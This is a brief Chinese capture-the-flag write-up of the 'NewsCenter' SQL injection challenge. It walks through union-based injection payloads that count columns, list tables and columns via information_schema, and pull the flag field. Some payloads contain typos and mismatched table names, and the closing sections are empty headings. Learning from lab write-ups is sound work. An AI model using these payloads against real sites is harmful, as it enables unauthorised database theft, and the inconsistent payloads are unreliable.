菜鸡刚学sqli,在这里写一道sql注入题的wp
题目:NewsCenter
手注
先通过order by
,判断后台select
的字段数量
3的时候,没问题
但是4的时候,就报错了
说明后台select
了3个字段
回显当前database:
1' union select 1,2,database()#
返回
news
,说明这个数据库名为news
回显news 数据库中所有表的名称:
1'union select 1,2,group_concat(table_name) from information_scheme.tables where table_schema=database()#
回显
secrec_table
中所有的字段名:1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='scret_table'
查看
fl4g
字段的所有数据:1' union select 1,2,group_concat(fl4g) from scret_table
sqlmap 注
总结
常用的payload们:
information_schema中常用的表与其常用字段: